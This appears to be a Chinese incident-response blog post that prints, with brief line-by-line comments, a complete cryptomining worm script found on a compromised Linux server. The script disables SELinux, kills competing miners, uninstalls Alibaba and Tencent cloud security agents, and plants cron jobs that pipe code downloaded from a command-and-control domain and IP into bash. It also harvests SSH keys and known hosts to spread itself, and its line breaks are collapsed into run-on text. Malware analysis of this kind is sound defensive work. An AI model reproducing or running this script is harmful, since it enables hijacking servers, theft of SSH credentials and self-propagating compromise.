日常應急響應過程中發現的挖礦腳本,對其進行分析發現寫的質量該不錯,可以學習下
SHELL=/bin/bashPATH=/sbin:/bin:/usr/sbin:/usr/bin#關閉SElinuxsetenforce 0 2>/dev/null#將用戶進程限制改為5000個ulimit -u 50000#臨時修該 vm.nr_hugepages參數sysctl -w vm.nr_hugepages=$((`grep -c processor /proc/cpuinfo` * 3))#跟據pid來干掉下面的端口運行的進程netstat -antp | grep ':3333' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9netstat -antp | grep ':4444' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9netstat -antp | grep ':5555' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9netstat -antp | grep ':7777' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9netstat -antp | grep ':14444' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9netstat -antp | grep ':5790' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9netstat -antp | grep ':45700' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9netstat -antp | grep ':2222' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9netstat -antp | grep ':9999' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9netstat -antp | grep ':20580' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9netstat -antp | grep ':13531' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9netstat -antp | grep '23.94.24.12:8080' | awk '{print $7}' | sed -e 's//.*//g' | xargs kill -9netstat -antp | grep '134.122.17.13:8080' | awk '{print $7}' | sed -e 's//.*//g' | xargs kill -9netstat -antp | grep '107.189.11.170:443' | awk '{print $7}' | sed -e 's//.*//g' | xargs kill -9#生成兩個隨機數rand=$(seq 0 255 | sort -R | head -n1)rand2=$(seq 0 255 | sort -R | head -n1)#將下面文件的保護機制去掉,使其可刪改chattr -i -a /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down#卸載阿里云的安騎士if ps aux | grep -i '[a]liyun'; then (wget -q -O - http://update.aegis.aliyun.com/download/uninstall.sh||curl -s http://update.aegis.aliyun.com/download/uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh (wget -q -O - http://update.aegis.aliyun.com/download/quartz_uninstall.sh||curl -s http://update.aegis.aliyun.com/download/quartz_uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/quartz_uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh pkill aliyun-service rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service rm -rf /usr/local/aegis*#關閉aliyun的服務 systemctl stop aliyun.service systemctl disable aliyun.service#干掉某云agent監控 service bcm-agent stop yum remove bcm-agent -y apt-get remove bcm-agent -y#干掉騰訊云的云鏡elif ps aux | grep -i '[y]unjing'; then /usr/local/qcloud/stargate/admin/uninstall.sh /usr/local/qcloud/YunJing/uninst.sh /usr/local/qcloud/monitor/barad/admin/uninstall.shfisleep 1echo "DER Uninstalled"#改變文件/tmp/dbused屬性(a:讓文件或目錄僅供附加用途、i:不得任意更動文件或目錄)chattr -ai /tmp/dbused#利用ifconfig和ip a找到B段,給range變量if [ -s /usr/bin/ifconfig ];thenrange=$(ifconfig | grep "BROADCAST|inet" | grep -oP 'inets+Kd{1,3}.d{1,3}' | grep -v 127 | grep -v inet6 |grep -v 255 | head -n1)elserange=$(ip a | grep "BROADCAST|inet" | grep -oP 'inets+Kd{1,3}.d{1,3}' | grep -v 127 | grep -v inet6 |grep -v 255 | head -n1)fi#測試礦池dns是否能解析pool.supportxmr.comif [ $(ping -c 1 pool.supportxmr.com 2>/dev/null|grep "bytes of data" | wc -l ) -gt '0' ];then dns=""else dns="-d"fi#測試礦池dns是否解析 bash.givemexyz.in,不能解析直接將url賦值為c2的地址if [ $(ping -c 1 bash.givemexyz.in 2>/dev/null|grep "bytes of data" | wc -l ) -gt '0' ];then url="http://bash.givemexyz.in"else url="http://209.141.40.190"fi#寫入計劃任務: 使用-e參數:激活轉義字符#前三個是吸入系統計劃任務#第四個是寫入個人計劃任務#寫入計劃任務的內容就是以curl、wget、python的urllib2庫 來下載挖礦樣本到/tmp/xms,并以bash來執行下載的挖礦樣本。之后再刪除下載的挖礦樣本/tmp/xmsecho -e "*/1 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xmsn##" > /etc/cron.d/rootecho -e "*/2 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xmsn##" > /etc/cron.d/apacheecho -e "*/3 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xmsn##" > /etc/cron.d/nginxecho -e "*/30 * * * *(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xmsn##" > /var/spool/cron/rootmkdir -p /var/spool/cron/crontabsecho -e "* * * * *(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xmsn##" > /var/spool/cron/crontabs/root#放入etc/cron.hourly的腳本會每小時執行一次,寫入計劃任務,并給有可執行權限mkdir -p /etc/cron.hourlyecho "(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1DIR="/tmp"cd $DIRif [ -a "/tmp/dbused" ]then if [ -w "/tmp/dbused" ] && [ ! -d "/tmp/dbused" ] #abused文件存在且可寫,并且不是一個目錄 then if [ -x "$(command -v md5sum)" ] #查看是否有md計算命令 md5sum then sum=$(md5sum /tmp/dbused | awk '{ print $1 }') #計算abused的md5至 echo $sum case $sum in dc3d2e17df6cef8df41ce8b0eba99291 | 101ce170dafe1d352680ce0934bfb37e) echo "x86_64 OK" ;; *) echo "x86_64 wrong" rm -rf /usr/local/lib/libkk.so echo "" > /etc/ld.so.preload pkill -f wc.conf pkill -f susss sleep 4 ;; esac fi echo "P OK" else DIR=$(mktemp -d)/tmp mkdir $DIR echo "T DIR $DIR" fielse #沒有dbused文件 if [ -d "/tmp" ] then DIR="/tmp" fi echo "P NOT EXISTS"fiif [ -d "/tmp/.sh/dbused" ]then DIR=$(mktemp -d)/tmp mkdir $DIR echo "T DIR $DIR"fi#刪除系統上的$2文件,用網上下載的$1文件替換#get函數定義get() { chattr -i $2; rm -rf $2 wget -q -O - $1 > $2 || curl -fsSL $1 -o $2 || lwp-download $1 $2 || chmod +x $2}#檢查dbused是否存在,存在的話就計算md5來校驗下,不存在就去下載downloadIfNeed(){ if [ -x "$(command -v md5sum)" ] then if [ ! -f $DIR/dbused ]; then echo "File not found!" download fi sum=$(md5sum $DIR/dbused | awk '{ print $1 }') echo $sum case $sum in dc3d2e17df6cef8df41ce8b0eba99291 | 101ce170dafe1d352680ce0934bfb37e) echo "x86_64 OK" ;; *) echo "x86_64 wrong" sizeBefore=$(du $DIR/x86_64) if [ -s /usr/bin/curl ]; then WGET="curl -k -o "; fi if [ -s /usr/bin/wget ]; then WGET="wget --no-check-certificate -O "; fi download sumAfter=$(md5sum $DIR/x86_64 | awk '{ print $1 }') if [ -s /usr/bin/curl ]; then echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sssus` > $DIR/tmp.txt fi ;; esac else echo "No md5sum" download fi}#download函數定義,驗證md5不存在調用download2下載download() { if [ -x "$(command -v md5sum)" ] then sum=$(md5sum $DIR/x86_643 | awk '{ print $1 }') echo $sum case $sum in dc3d2e17df6cef8df41ce8b0eba99291 | dc3d2e17df6cef8df41ce8b0eba99291) echo "x86_64 OK" cp $DIR/x86_643 $DIR/x86_64 cp $DIR/x86_643 $DIR/x86_64 ;; *) echo "x86_64 wrong" download2 ;; esac else echo "No md5sum" download2 fi}#調用get函數進行下載download2() {get $url/$(uname -m) "$DIR"/dbused if [ -x "$(command -v md5sum)" ] then sum=$(md5sum $DIR/dbused | awk '{ print $1 }') echo $sum case $sum in dc3d2e17df6cef8df41ce8b0eba99291 | 101ce170dafe1d352680ce0934bfb37e) echo "x86_64 OK" cp $DIR/x86_64 $DIR/x86_643 ;; *) echo "x86_64 wrong" ;; esac else echo "No md5sum" fi}judge() { if [ ! "$(netstat -ant|grep '212.114.52.24:8080|194.5.249.24:8080'|grep 'ESTABLISHED'|grep -v grep)" ]; then get $url/$(uname -m) "$DIR"/dbused chmod +x "$DIR"/dbused "$DIR"/dbused -c $dns "$DIR"/dbused -pwn sleep 5 elseecho "Running" fi}if [ ! "$(netstat -ant|grep '212.114.52.24:8080|194.5.249.24:8080'|grep 'LISTEN|ESTABLISHED|TIME_WAIT'|grep -v grep)" ];then judgeelse echo "Running"fiif [ ! "$(netstat -ant|grep '104.168.71.132:80'|grep 'ESTABLISHED'|grep -v grep)" ];then get $url/bashirc.$(uname -m) "$DIR"/bashirc chmod 777 "$DIR"/bashirc "$DIR"/bashircelseecho "Running"fi#檢查計劃任務,如不存在則重新建立if crontab -l | grep -q "$url"then echo "Cron exists"else crontab -r echo "Cron not found" echo "* * * * * (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms" | crontab -fi#或取本機器密鑰KEYS=$(find ~/ /root /home -maxdepth 2 -name 'id_rsa*' | grep -vw pub)KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')KEYS3=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)#獲取機器記錄的hostHOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}.){3}[0-9]{1,3}")HOSTS3=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}.){3}[0-9]{1,3}" | uniq)#獲取機器記錄的user名USERZ=$( echo "root" find ~/ /root /home -maxdepth 2 -name '.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -v ".ssh")#將以上信息加入list方便后面調用userlist=$(echo $USERZ | tr ' ' 'n' | nl | sort -u -k2 | sort -n | cut -f2-)hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3" | grep -vw 127.0.0.1 | tr ' ' 'n' | nl | sort -u -k2 | sort -n | cut -f2-)keylist=$(echo "$KEYS $KEYS2 $KEYS3" | tr ' ' 'n' | nl | sort -u -k2 | sort -n | cut -f2-)for user in $userlist; do for host in $hostlist; do for key in $keylist; do chmod +r $key; chmod 400 $key #使用密鑰登錄直接執行后面的命令 ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host "(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms" done donedone#恢復環境,刪除相關的痕跡并將之前相關系統文件的權限加上rm -rf "$DIR"/2start.jpgrm -rf "$DIR"/xmichattr +ai -V /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down154404.html
